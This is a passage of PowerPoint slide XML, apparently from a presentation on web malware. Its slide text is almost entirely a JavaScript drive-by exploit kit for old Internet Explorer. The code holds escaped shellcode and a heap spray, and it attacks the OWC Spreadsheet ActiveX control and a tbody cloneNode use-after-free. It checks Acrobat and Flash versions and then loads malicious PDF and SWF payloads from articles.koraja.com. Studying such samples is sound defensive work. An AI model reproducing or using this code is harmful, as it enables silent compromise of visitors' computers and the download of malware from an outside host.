              <a:t>=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=3"/&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name="quality" value="high"/&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bgcolor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" value="#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ffffff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"/&gt;&lt;embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://articles.koraja.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>showcat.php?cid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=3"/&gt;&lt;/embed&gt;&lt;/object&gt;');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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scode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1"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function ek13() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    return true;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 err="1"/>
              <a:t>window.onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = ek13;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scode1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + "%u7468%u7074%u2F3A%u612F%u7472%u6369%u656C%u2E73%u6F6B%u6172%u616A%u632E%u6D6F%u732F%u6F68%u6377%u7461%u702E%u7068%u633F%u6469%u383D%u2637%u6E63%u4D3D%u7375%u6369%u252B%u3632%u4D2B%u3350%u733F%u453D%u7159%u6735%u4337%u2667%u6469%u313D%u0032");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>try {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obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("OWC10.Spreadsheet");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) {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obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("OWC11.Spreadsheet");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) {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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://articles.koraja.com/showcat.php?cid=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=4&gt;&lt;\/script&gt;");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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> array = new Array();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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0x81000 - (scode1.length * 2);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bigblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("%u0b0c%u0b0C");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        while (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bigblock.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / 2) {</a:t>
            </a:r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 err="1"/>
              <a:t>bigblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bigblock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        }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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bigblock.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / 2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bigblock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        for (i = 0; i &lt; 0x99 * 2; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            array[i] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + scode1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        e = new Array();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e.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(1);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e.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(2);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e.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0);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e.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(window);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        for (i = 0; i &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>e.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            for (j = 0; j &lt; 10; j++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>obj.Evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e[i]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                } catch (e) {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        }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window.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = e[3] + "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        for (j = 0; j &lt; 10; j++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>obj.msDataSourceObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e[3]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            } catch (e) {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} catch (e) {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scode2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + "%u7468%u7074%u2F3A%u612F%u7472%u6369%u656C%u2E73%u6F6B%u6172%u616A%u632E%u6D6F%u732F%u6F68%u6377%u7461%u702E%u7068%u633F%u6469%u383D%u2637%u6E63%u4D3D%u7375%u6369%u252B%u3632%u4D2B%u3350%u733F%u453D%u7159%u6735%u4337%u2667%u6469%u313D%u0033");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o84r = new Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> m79k = 0x100000 - (scode2.length * 2 + 0x01020);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> d15t = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("%u0C0C%u0C0C");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>while (d15t.length &lt; m79k / 2) d15t += d15t;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> f20b = d15t.substring(0, m79k / 2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>delete d15t;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for (v95l = 0; v95l &lt; 0xC0; v95l++) o84r[v95l] = f20b + scode2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> m77k = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e89f = new Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e45n = 0; e45n &lt; 1000; e45n++) e89f.push(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r27n = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tbody</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r27n.click;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o88j = r27n.cloneNode();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r27n.clearAttributes();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r27n = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e45n = 0; e45n &lt; e89f.length; e45n++) e89f[e45n].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = m77k;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o88j.click;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("&lt;/div&gt;");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76200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zmn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null;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try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zmn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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("AcroPDF.PDF");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 catch (e) {}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(!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zmn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try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zmn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new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PDF.PdfCtrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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} catch (e) {}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zmn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lv = ((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zmn.GetVersions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().split(","))[4].split("="))[1].replace(/\./g, "");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if ((lv &lt; 900) &amp;&amp; (lv != 813)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write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('&lt;embed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src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="http://articles.koraja.com/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showcat.php?cid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=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=2" width=100 height=100 type="application/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pdf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"&gt;&lt;/embed&gt;');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try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zmn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0;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zmn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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("ShockwaveFlash.ShockwaveFlash.9")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GetVariable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("$" + "version").split(",");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 catch (e) {}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zmn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&amp;&amp;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zmn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 &lt; 124))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document.write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('&lt;object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classid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="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle&gt;&lt;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param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name="movie" value="http://articles.koraja.com/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showcat.php?cid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=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=3"/&gt;&lt;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param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name="quality" value="high"/&gt;&lt;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param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name="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bgcolor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 value="#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ffffff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"/&gt;&lt;embed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src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="http://articles.koraja.com/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showcat.php?cid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=87&amp;cn=Music+%26+MP3?s=EYq5g7Cg&amp;id=3"/&gt;&lt;/embed&gt;&lt;/object&gt;');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scode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"%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC